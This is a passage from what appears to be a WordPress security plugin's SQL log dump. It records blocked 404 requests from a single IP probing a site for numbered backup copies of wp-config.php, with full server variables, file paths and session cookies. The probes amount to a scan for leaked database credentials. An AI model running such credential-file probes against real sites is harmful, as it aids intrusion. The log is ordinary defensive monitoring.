Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php12\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php12\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxl8sfRZ9CaO@EBI5nb@QAAAIQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php12\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php12\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxl8sfRZ9CaO@EBI5nb@QAAAIQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"43449\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php12\";s:10:\"SCRIPT_URL\";s:16:\"/wp-config.php12\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxl8sfRZ9CaO@EBI5nb@QAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530802.2362\";s:12:\"REQUEST_TIME\";s:10:\"1570530802\";}}','notice','2019-10-08 10:33:24','2019-10-08 10:33:22',35038784,36840616,'https://bintara.com.my/wp-config.php12',1,0,'185.220.101.30'),(27675,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp-config.php11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1a635b4481b1dd83a1f44581157cd4a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php11\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php11\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxl61Q75tQHORtJE8pefgAAAFQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php11\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php11\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxl61Q75tQHORtJE8pefgAAAFQ\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"36765\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php11\";s:10:\"SCRIPT_URL\";s:16:\"/wp-config.php11\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxl61Q75tQHORtJE8pefgAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530795.1251\";s:12:\"REQUEST_TIME\";s:10:\"1570530795\";}}','notice','2019-10-08 10:33:16','2019-10-08 10:33:15',35040592,36841064,'https://bintara.com.my/wp-config.php11',1,0,'185.220.101.30'),(27674,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp-config.php10\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1a635b4481b1dd83a1f44581157cd4a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php10\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php10\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxl5a43yJFbTvEjNLEtSQAAARM\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php10\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp-config.php10\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxl5a43yJFbTvEjNLEtSQAAARM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"35339\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp-config.php10\";s:10:\"SCRIPT_URL\";s:16:\"/wp-config.php10\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxl5a43yJFbTvEjNLEtSQAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530789.2293\";s:12:\"REQUEST_TIME\";s:10:\"1570530789\";}}','notice','2019-10-08 10:33:10','2019-10-08 10:33:09',35038784,36840616,'https://bintara.com.my/wp-config.php10',1,0,'185.220.101.30'),(27673,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php9\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=1a635b4481b1dd83a1f44581157cd4a6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php9\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php9\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxl3K43yJFbTvEjNLEtRgAAARY\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php9\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php9\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxl3K43yJFbTvEjNLEtRgAAARY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"43779\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php9\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php9\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxl3K43yJFbTvEjNLEtRgAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570530780.815\";s:12:\"REQUEST_TIME\";s:10:\"1570530780\";}}','notice','2019-10-08 10:33:02','2019-10-08 10:33:01',35035952,36837776,'https://bintara.com.my/wp-config.php9',1,0,'185.220.101.30'),(27672,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php8\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php8\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxl0643yJFbTvEjNLEtQwAAAQI\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php8\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php8\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxl0643yJFbTvEjNLEtQwAAAQI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"39276\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php8\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php8\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxl0643yJFbTvEjNLEtQwAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530772.0531\";s:12:\"REQUEST_TIME\";s:10:\"1570530772\";}}','notice','2019-10-08 10:32:53','2019-10-08 10:32:52',35041936,36844352,'https://bintara.com.my/wp-config.php8',1,0,'185.220.101.30'),(27671,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php7\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=defb252fc9cb9b0c0bb95b0dd70fa3b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php7\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php7\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxlynURUVLSjYCXpcInAQAAAMU\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php7\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php7\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxlynURUVLSjYCXpcInAQAAAMU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"41212\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php7\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php7\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxlynURUVLSjYCXpcInAQAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530763.0655\";s:12:\"REQUEST_TIME\";s:10:\"1570530763\";}}','notice','2019-10-08 10:32:45','2019-10-08 10:32:43',35035952,36837776,'https://bintara.com.my/wp-config.php7',1,0,'185.220.101.30'),(27670,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php6\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=defb252fc9cb9b0c0bb95b0dd70fa3b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php6\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php6\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxlxMfRZ9CaO@EBI5nb5AAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php6\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php6\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxlxMfRZ9CaO@EBI5nb5AAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"39547\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php6\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php6\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxlxMfRZ9CaO@EBI5nb5AAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570530756.662\";s:12:\"REQUEST_TIME\";s:10:\"1570530756\";}}','notice','2019-10-08 10:32:38','2019-10-08 10:32:37',35035952,36837776,'https://bintara.com.my/wp-config.php6',1,0,'185.220.101.30'),(27669,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php5\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=defb252fc9cb9b0c0bb95b0dd70fa3b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php5\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php5\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxlva43yJFbTvEjNLEtQQAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php5\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php5\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxlva43yJFbTvEjNLEtQQAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5:\"46591\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php5\";s:10:\"SCRIPT_URL\";s:15:\"/wp-config.php5\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZxlva43yJFbTvEjNLEtQQAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570530749.3387\";s:12:\"REQUEST_TIME\";s:10:\"1570530749\";}}','notice','2019-10-08 10:32:31','2019-10-08 10:32:29',35035952,36837776,'https://bintara.com.my/wp-config.php5',1,0,'185.220.101.30'),(27668,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/wp-config.php4\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=defb252fc9cb9b0c0bb95b0dd70fa3b8\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:52:\"MobileSafari/8536.25 CFNetwork/609.1.4 Darwin/13.0.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php4\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php4\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZxltsfRZ9CaO@EBI5nb4wAAAIw\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/wp-config.php4\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/wp-config.php4\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZxltsfRZ9CaO@EBI5nb4wAAAIw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.30\";s:11:\"REMOTE_PORT\";s:5